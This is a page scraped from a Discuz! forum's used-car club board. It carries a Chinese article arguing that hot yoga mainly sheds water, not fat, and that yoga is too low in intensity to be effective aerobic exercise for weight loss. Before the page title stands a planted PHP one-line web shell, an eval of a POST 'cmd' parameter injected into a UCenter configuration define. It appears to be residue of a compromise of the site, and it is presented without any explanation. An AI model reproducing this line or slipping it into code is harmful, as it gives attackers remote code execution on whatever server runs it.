');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 高溫瑜伽只減水份不減肥 - 二手車俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

高溫瑜伽只減水份不減肥

這兩年,高溫瑜伽風靡各大健身俱樂部和瑜伽館。這種瑜伽在人造的高溫環境下練習,幾個簡單的伸展動作或甚至躺在地上不動,就可以大汗淋漓,一堂課下來瘦一公斤並非難事,想減肥的人都從中看到了希望。

  高溫瑜伽真的這麼「靈驗」嗎?其實不然。當身體處於高溫之下,血液自然流向表皮幫助散熱,如果同時間進行伸展運動,肌肉也需要血液來提供能量,再加上身體大量出汗, 迅速脫水,血液變得黏稠,這樣不僅不能同時為皮膚散熱和肌肉運動提供能量,身體反而可能出現一連串不適。更何況,瑜伽講求心境平和,而高溫會導致精神緊張,本身就與瑜伽的平和背道而馳。

  其實,減肥是減去「脂肪」,而不是水分。很多人發現高溫瑜伽課程結束後,體重能降低1公斤左右,便認為減肥了,這是被誤導了。高溫的環境,身體為維持正常的生理機能,會更多地排汗,但這並不等於燃燒脂肪。實際上,這「減去」的體重,絕大部分是水分,而它們必須要補充回來。

  其次,如果要有效減肥,就應該滿足三個基本條件:中低強度的有氧運動、全身性的運動、持續20分鐘以上。對後兩條來說,瑜伽都能滿足,卻不能滿足第一條。

  有氧運動是指運動強度較小、持續時間較長、體內代謝過程中有氧氣充分參與的運動方式,常見的有跑步、游泳、騎自行車等。我們在做長時間有氧運動時,身體會同時動用糖原和脂肪,當運動強度為最大吸氧量的65%左右時,身體更多地依靠脂肪供能。而瑜伽對心肺耐力、肌肉耐力的訓練價值不大。既不是有氧運動,運動強度也不夠大,因而減肥效果不大。
返回列表